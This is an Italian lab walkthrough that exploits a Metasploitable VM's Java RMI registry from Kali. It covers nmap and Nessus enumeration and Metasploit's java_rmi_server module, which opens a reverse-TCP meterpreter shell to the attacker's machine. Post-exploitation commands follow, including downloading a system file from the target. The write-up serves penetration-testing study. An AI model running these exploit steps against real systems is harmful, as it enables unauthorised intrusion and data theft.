

Prepariamo le macchine impostando gli IP richiesti:

Kali Linux: 192.168.99.111

Metasploitable: 192.168.99.112

Controlliamo che funzioni il collegamento tra le macchine in rete interna tramite ping.

```
(kali@kali)-[~/Desktop]
$ ping 192.168.99.112
PING 192.168.99.112 (192.168.99.112) 56(84) bytes of data:
64 bytes from 192.168.99.112: icmp_seq=1 ttl=64 time=0.478 ms
64 bytes from 192.168.99.112: icmp_seq=2 ttl=64 time=0.248 ms
64 bytes from 192.168.99.112: icmp_seq=3 ttl=64 time=0.246 ms
^C
— 192.168.99.112 ping statistics —
3 packets transmitted, 3 received, 0% packet loss, time 2022ms
rtt min/avg/max/mdev = 0.246/0.324/0.478/0.108 ms
```

Enumerazione dei servizi

Iniziamo con una serie di scansioni con **nmap** sull'IP della macchina target, con **-O** possiamo identificare da remoto il **Sistema Operativo** attraverso il fingerprint dello stack TCP/IP. Proseguiamo con una scansione tcp con **-sT**, una scansione che analizza tutto il processo del **3 Way Hand-Shake** e infine con una scansione **-sV** in cui vedremo oltre i Service attivi nelle porte aperte anche la Version

```
(kali@kali)-[~/Desktop]
$ sudo nmap -O 192.168.99.112
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-16 06:07 EDT
Nmap scan report for 192.168.99.112
Host is up (0.00048s latency).
Not shown: 977 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
8009/tcp  open  ajp13
8180/tcp  open  unknown
MAC Address: 08:00:27:86:18:45 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org
Nmap done: 1 IP address (1 host up) scanned in 14.98 seconds
```

scansione tcp

Version detection

```
(kali@kali)-[~/Desktop]
$ nmap -sT 192.168.99.112
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.168.99.112
Host is up (0.00033s latency).
```

```
(kali@kali)-[~/Desktop]
$ nmap -sV 192.168.99.112
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-16 06:22 EDT
Nmap scan report for 192.168.99.112
Host is up (0.0011s latency).
```

Host is up (0.00033s latency).			Not shown: 977 closed tcp ports (conn-refused)		
PORT	STATE	SERVICE	PORT	STATE	SERVICE
21/tcp	open	ftp	21/tcp	open	ftp
22/tcp	open	ssh	22/tcp	open	ssh
23/tcp	open	telnet	23/tcp	open	telnet
25/tcp	open	smtp	25/tcp	open	smtp
53/tcp	open	domain	53/tcp	open	domain
80/tcp	open	http	80/tcp	open	http
111/tcp	open	rpcbind	111/tcp	open	rpcbind
139/tcp	open	netbios-ssn	139/tcp	open	netbios-ssn
445/tcp	open	microsoft-ds	445/tcp	open	netbios-ssn
512/tcp	open	exec	512/tcp	open	exec
513/tcp	open	login	513/tcp	open	login?
514/tcp	open	shell	514/tcp	open	shell
1099/tcp	open	rmiregistry	1099/tcp	open	java-rmi
1524/tcp	open	ingreslock	1524/tcp	open	bindshell
2049/tcp	open	nfs	2049/tcp	open	nfs
2121/tcp	open	ccproxy-ftp	2121/tcp	open	ftp
3306/tcp	open	mysql	3306/tcp	open	mysql
5432/tcp	open	postgresql	5432/tcp	open	postgresql
5900/tcp	open	vnc	5900/tcp	open	vnc
6000/tcp	open	X11	6000/tcp	open	X11
6667/tcp	open	irc	6667/tcp	open	irc
8009/tcp	open	ajp13	8009/tcp	open	ajp13
8180/tcp	open	unknown	8180/tcp	open	http
Nmap done: 1 IP address (1 host up) scanned in 66.39 seconds			Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel		
			Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .		
			Nmap done: 1 IP address (1 host up) scanned in 66.39 seconds		

Dalle scansioni con nmap possiamo individuare diverse informazioni.

Con la scansione **-O** eseguiamo la Os. fingerprinter che ci mostra la **CPE (Common Platform Enumeration)** per il rilevamento del servizio e del sistema operativo su quel target, quindi un Linux 2.6, nel dettaglio una versione compresa tra 2.6.9 e 2.6.33 e che la macchina target è montata su **Oracle VirtualBox Virtual NIC**.

Con la Version Detection abbiamo innanzitutto una nuova volonna VERSION del SERVER, ma anche informazioni sull'**Hosts**, in questo

Vulnerability Scanner

Avviamo una scansione su Nessus, tra le varie criticità troviamo questa relativa al **RMI Registry Detection** sulla **porta 1099** che, come

Vulnerabilities 59

INFO RMI Registry Detection

Description

The remote host is running an RMI registry, which acts as a bootstrap naming service for registering and retrieving remote objects with simple names in the Java Remote Method Invocation (RMI) system.

See Also

<https://docs.oracle.com/javase/1.5.0/docs/guide/rmi/spec/rmiTOC.html>
<http://www.nessus.org/u7b6fd7659>

Output

```
Valid response recieved for port 1099:
0x00: 51 AC ED 00 05 77 0F 01 4F 13 5F BA 00 00 01 88
0x10: C3 11 79 46 80 02 75 72 00 13 5B 4C 6A 61 76 61
0x20: 2E 6C 61 6E 67 2E 53 74 72 69 6E 67 3B AD D2 56
0x30: E7 E9 1D 7B 47 02 00 00 70 78 70 00 00 00 00
Q...w..O.....
..yP..ur..[Ljava
.lang.String;..V
...{G...pxp....
```

To see debug logs, please visit individual host

Port	Hosts
1099 / tcp / rmi_regist...	192.168.99.112

No output recorded.

To see debug logs, please visit individual host

Port	Hosts
1099 / tcp / rmi_regist...	192.168.99.112

Plugin Details

Severity: Info
ID: 22227
Version: 1.22
Type: remote
Family: Service detection
Published: August 16, 2006
Modified: June 1, 2022

Risk Information

Risk Factor: None

Vulnerability Information

CPE: cpe:/a:oracle:java_se
Asset Inventory: True

ULTERIORI CONTROLLI SULLA PORTA SPECIFICA

Possiamo usare **nmap** anche per una scansione mirata sulla singola porta per verificarne la vulnerabilità, ma anche **netcat** (dove **-v** sta per verbose in modo da ottenere informazioni aggiuntive) e **telnet** ci dicono che la porta è aperta.

```
[kali@kali]~$ nmap --script rmi-vuln-classloader -p 1099 192.168.99.112
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-16 10:36 EDT
Nmap scan report for 192.168.99.112
Host is up (0.00058s latency).

PORT      STATE SERVICE
1099/tcp  open  rmiregistry
| rmi-vuln-classloader:
|   VULNERABLE:
|     RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|     Default configuration of RMI registry allows loading classes from remote URLs which can lead to remot
e code execution.
|
| References:
|   https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_serve
r.rb
```

```
(kali㉿kali)-[~]
$ nc -v 192.168.99.112 1099
192.168.99.112: inverse host lookup failed: Host name lookup failure
(UNKNOWN) [192.168.99.112] 1099 (rmiregistry) open
```

```
(kali@kali)~$ telnet 192.168.99.112 1099
Trying 192.168.99.112 ...
Connected to 192.168.99.112.
Escape character is '^'.
```

EXPLOITE

Eseguiamo la procedura per ottenere una sessione remota di meterpreter. Avviamo **msfconsole**, cerchiamo il modulo che ci interessa con **search java_rmi** e tramite il comando **use** seguito dal path andiamo ad usare **exploit/multi/misc/java_rmi_server** che in descrizione contiene Default Configuration Java Code Execution. **ATTENZIONE** di default viene già configurato il payload **meterpreter**.

[illegible]

```
Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Press SPACE BAR to continue

=[ metasploit v6.3.19-dev ]
+ --==[ 2318 exploits - 1215 auxiliary - 412 post ]
+ --==[ 1234 payloads - 46 encoders - 11 nops ]
+ --==[ 9 evasion ]

Metasploit tip: View missing module options with show
missing
Metasploit Documentation: https://docs.metasploit.com/

msf6 > 
```

```
msf6 > search java_rmi

Matching Modules
View Help

#  Name                                     Disclosure Date  Rank    Check  Description
-  -
0  auxiliary/gather/java_rmi_registry        normal          No     Java RMI Registry Inte
faces Enumeration
1  exploit/multi/misc/java_rmi_server        2011-10-15      excellent Yes     Java RMI Server Insecu
e Default Configuration Java Code Execution
2  auxiliary/scanner/misc/java_rmi_server    2011-10-15      normal   No     Java RMI Server Insecu
e Endpoint Code Execution Scanner
3  exploit/multi/browser/java_rmi_connection_impl 2010-03-31      excellent No     Java RMIConnectionImpl
Deserialization Privilege Escalation

Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/browser/java_rmi_connec
tion_impl

msf6 > use 1
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
```

Andiamo a controllare le opzioni, notiamo che nel settaggio manca il dato relativo all'RHOST, cioè l'IP della macchina target, con il comando **set RHOST** seguito dall'IP lo andiamo a modificare, mentre l'LHOST, cioè il Local Host è già settato correttamente.

```
msf6 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name      Current Setting  Required  Description
--      -
HTTPDELAY  10              yes       Time that the HTTP Server will wait for the payload request
RHOSTS    yes             The target host(s), see https://docs.metasploit.com/docs/using-metas
ploit/basics/using-metasploit.html
RPORT     1099            yes       The target port (TCP)
SRVHOST   0.0.0.0         yes       The local host or network interface to listen on. This must be an ad
dress on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT   8080            yes       The local port to listen on.
SSL        false           no        Negotiate SSL for incoming connections
SSLCert   no              Path to a custom SSL certificate (default is randomly generated)
URIPATH   no              The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
--      -
LHOST     192.168.99.111  yes       The listen address (an interface may be specified)
LPORT     4444            yes       The listen port

Exploit target:

Id  Name
--  -
0   Generic (Java Payload)

View the full module info with the info, or info -d command.
```



```
msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.99.112
RHOSTS => 192.168.99.112
```

Per sicurezza controlliamo di nuovo le opzioni dopo la modifica, appurato che la modifica è stata salvata lanciamo l'attacco con il comando **exploit**.

```
msf6 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):



| Name      | Current Setting | Required | Description                                                                                                                                                                                         |
|-----------|-----------------|----------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| HTTPDELAY | 10              | yes      | Time that the HTTP Server will wait for the payload request                                                                                                                                         |
| RHOSTS    | 192.168.99.112  | yes      | The target host(s), see <a href="https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html">https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html</a> |
| RPORT     | 1099            | yes      | The target port (TCP)                                                                                                                                                                               |
| SRVHOST   | 0.0.0.0         | yes      | The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.                                                               |
| SRVPORT   | 8080            | yes      | The local port to listen on.                                                                                                                                                                        |
| SSL       | false           | no       | Negotiate SSL for incoming connections                                                                                                                                                              |
| SSLCert   |                 | no       | Path to a custom SSL certificate (default is randomly generated)                                                                                                                                    |
| URIPATH   |                 | no       | The URI to use for this exploit (default is random)                                                                                                                                                 |



Payload options (java/meterpreter/reverse_tcp):



| Name  | Current Setting | Required | Description                                        |
|-------|-----------------|----------|----------------------------------------------------|
| LHOST | 192.168.99.111  | yes      | The listen address (an interface may be specified) |
| LPORT | 4444            | yes      | The listen port                                    |



Exploit target:



| Id | Name                   |
|----|------------------------|
| 0  | Generic (Java Payload) |



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/java_rmi_server) > exploit

[*] Started reverse TCP handler on 192.168.99.111:4444
[*] 192.168.99.112:1099 - Using URL: http://192.168.99.111:8080/q3EfmdDaBbJv
[*] 192.168.99.112:1099 - Server started.
[*] 192.168.99.112:1099 - Sending RMI Header ...
[*] 192.168.99.112:1099 - Sending RMI Call ...
[*] 192.168.99.112:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 192.168.99.112
[*] Meterpreter session 1 opened (192.168.99.111:4444 -> 192.168.99.112:54116) at 2023-06-16 08:48:49 -0400

meterpreter > █
```

Testiamo meterpreter usando dei semplici comandi per ottenere delle informazioni sulla configurazione di rete (**ifconfig** e **sysinfo**) e sulla di routing, volendo possiamo aprire nel visualizzare il contenuto del file dell'interfaccia di rete ma anche scaricarlo sulla nostra macchina.

```
meterpreter > ifconfig
```

```
Interface 1
=====
Name       : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
```

```
Interface 2
=====
Name       : eth0 - eth0
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 192.168.99.112
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe86:1845
IPv6 Netmask : ::
```

```
meterpreter > sysinfo
Computer      : metasploitable
OS            : Linux 2.6.24-16-server (i386)
Architecture : x86
System Language : en_US
Meterpreter   : java/linux
```

```
meterpreter > route
```

```
IPv4 network routes
```

Subnet	Netmask	Gateway	Metric	Interface
127.0.0.1	255.0.0.0	0.0.0.0		
192.168.99.112	255.255.255.0	0.0.0.0		

```
IPv6 network routes
```

Subnet	Netmask	Gateway	Metric	Interface
::1	::	::		
fe80::a00:27ff:fe86:1845	::	::		

```
meterpreter > █
```

```

meterpreter > pwd
/
meterpreter > cat /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 192.168.99.112
netmask 255.255.255.0
network 192.168.99.0
broadcast 192.168.99.255
gateway 192.168.99.100
meterpreter > download /etc/network/interfaces
[*] Downloading: /etc/network/interfaces -> /home/kali/interfaces
[*] Downloaded 384.00 B of 384.00 B (100.0%): /etc/network/interfaces -> /home/kali/interfaces
[*] Completed : /etc/network/interfaces -> /home/kali/interfaces
meterpreter >

```

Continuiamo a testare i comandi che possiamo dare alla macchina target, innanzitutto con il comando help, e poi controlliamo se possiamo capire in che directory siamo, spostarci tra esse, creare file o cartelle

```

meterpreter > pwd
/
meterpreter > ls
Listing: /

```

Mode	Size	Type	Last modified	Name
040666/rw-rw-rw-	4096	dir	2012-05-13 23:35:33 -0400	bin
040666/rw-rw-rw-	1024	dir	2012-05-13 23:36:28 -0400	boot
040666/rw-rw-rw-	4096	dir	2010-03-16 18:55:51 -0400	cdrom
040666/rw-rw-rw-	13540	dir	2023-06-16 02:59:44 -0400	dev
040666/rw-rw-rw-	4096	dir	2023-06-16 02:59:49 -0400	etc
040666/rw-rw-rw-	4096	dir	2010-04-16 02:16:02 -0400	home
040666/rw-rw-rw-	4096	dir	2010-03-16 18:57:40 -0400	initrd
100666/rw-rw-rw-	7929183	fil	2012-05-13 23:35:56 -0400	initrd.img
040666/rw-rw-rw-	4096	dir	2012-05-13 23:35:22 -0400	lib
040666/rw-rw-rw-	16384	dir	2010-03-16 18:55:15 -0400	lost+found
040666/rw-rw-rw-	4096	dir	2010-03-16 18:55:52 -0400	media
040666/rw-rw-rw-	4096	dir	2010-04-28 16:16:56 -0400	mnt
100666/rw-rw-rw-	14473	fil	2023-06-16 03:00:10 -0400	nohup.out
040666/rw-rw-rw-	4096	dir	2010-03-16 18:57:39 -0400	opt
040666/rw-rw-rw-	0	dir	2023-06-16 02:59:29 -0400	proc
040666/rw-rw-rw-	4096	dir	2023-06-16 03:00:10 -0400	root
040666/rw-rw-rw-	4096	dir	2012-05-13 21:54:53 -0400	sbin
040666/rw-rw-rw-	4096	dir	2010-03-16 18:57:38 -0400	srv
040666/rw-rw-rw-	0	dir	2023-06-16 02:59:30 -0400	sys
040666/rw-rw-rw-	4096	dir	2023-06-12 06:01:57 -0400	test_metasploit
040666/rw-rw-rw-	4096	dir	2023-06-16 09:08:45 -0400	tmp
040666/rw-rw-rw-	4096	dir	2010-04-28 00:06:37 -0400	usr
040666/rw-rw-rw-	4096	dir	2010-03-17 10:08:23 -0400	var
100666/rw-rw-rw-	1987288	fil	2008-04-10 12:55:41 -0400	vmlinuz

```

meterpreter >

```

Scopriamo che possiamo spostarci in alcune directory, andiamo in home e creiamo una nuova cartella chiamata prova, ma non è possibile creare un file di testo

```

meterpreter > cd home
meterpreter > pwd
/home
meterpreter > ls
Listing: /home

```

Mode	Size	Type	Last modified	Name
040666/rw-rw-rw-	4096	dir	2010-03-17 10:08:02 -0400	ftp
040666/rw-rw-rw-	4096	dir	2023-06-06 06:25:02 -0400	msfadmin
040666/rw-rw-rw-	4096	dir	2010-04-16 02:16:02 -0400	service
040666/rw-rw-rw-	4096	dir	2010-05-07 14:38:06 -0400	user

```

meterpreter > mkdir prova
Creating directory: prova

```

Notiamo come alcuni comandi non vengano riconosciuti, andiamo quindi a creare una **shell**, riproviamo con gli stessi comandi che adesso possiamo effettuare perché abbiamo acquisito i **permessi di root** e quindi potremmo potenzialmente agire con più libertà.

```
meterpreter > ls
Listing: /home
=====
```

Mode	Size	Type	Last modified	Name
040666/rw-rw-rw-	4096	dir	2010-03-17 10:08:02 -0400	ftp
040666/rw-rw-rw-	4096	dir	2023-06-06 06:25:02 -0400	msfadmin
040666/rw-rw-rw-	4096	dir	2023-06-16 09:11:52 -0400	prova
040666/rw-rw-rw-	4096	dir	2010-04-16 02:16:02 -0400	service
040666/rw-rw-rw-	4096	dir	2010-05-07 14:38:06 -0400	user

```
meterpreter > cd prova
meterpreter > touch fileprova.txt
[-] Unknown command: touch
meterpreter > ls
No entries exist in /home/prova
meterpreter > nano fileprova.txt
[-] Unknown command: nano
```